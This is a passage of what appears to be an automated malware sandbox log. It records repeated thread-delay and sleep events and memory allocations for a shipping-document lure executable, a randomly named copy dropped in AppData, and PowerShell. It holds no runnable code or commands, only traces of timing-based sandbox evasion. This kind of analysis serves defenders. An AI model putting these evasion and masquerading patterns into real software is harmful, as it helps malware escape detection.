                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 8B10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 9B10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 1480000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 15D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599765
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599656
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599546
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599436
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599328
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599218
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599108
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599000
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598890
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598780
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598671
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598562
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598452
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598343
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598234
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598125
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598010
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597906
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597796
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597687
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597578
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597468
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597359
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597250
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597140
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 597031
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596921
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596812
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596703
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596593
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596484
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596375
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596265
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596156
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 596046
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595937
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595828
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595718
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595609
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595500
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595390
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595281
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595171
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 595058
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 594953
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 594843
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 594734
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 594613
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598735
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597747
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 597047
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 596938
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 596813
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 596590
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 596469
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 596341
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595865
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595749
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595297
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 595078
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594969
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594739
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594500
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594391
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Thread delayed: delay time: 594050
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7118
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 800
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7915
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1124
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Window / User API: threadDelayed 6904
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Window / User API: threadDelayed 2954
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Window / User API: threadDelayed 8054
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe  Window / User API: threadDelayed 1793
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 7568  Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260  Thread sleep count: 7118 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260  Thread sleep count: 800 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2496  Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352  Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4348  Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372  Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep count: 33 > 30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -30437127721620741s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 7672  Thread sleep count: 6904 > 30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 7672  Thread sleep count: 2954 > 30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599546s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599436s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599108s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -599000s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598780s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598671s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598452s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598343s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598234s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598125s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -598010s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597906s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597796s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597578s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597468s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597359s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597250s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597140s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -597031s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596921s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596812s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596593s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596484s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596375s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596265s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596156s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -596046s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595937s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595828s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595718s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595609s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595500s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595390s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595281s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595171s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -595058s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -594953s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -594843s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -594734s >= -30000s
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396  Thread sleep time: -594613s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 4068  Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 8188  Thread sleep count: 8054 > 30
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 8188  Thread sleep count: 1793 > 30
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -599094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598982s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -598110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597747s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -597047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -596938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -596813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -596590s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -596469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -596341s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595982s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595865s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595749s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595297s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -595078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594739s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768  Thread sleep time: -594050s >= -30000s
                    Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599765
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599656
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599546
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599436
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599328
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599218
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599108
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 599000
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598890
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598780
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598671
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598562
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598452
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598343
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598234
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe  Thread delayed: delay time: 598125
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598010Jump to behavior
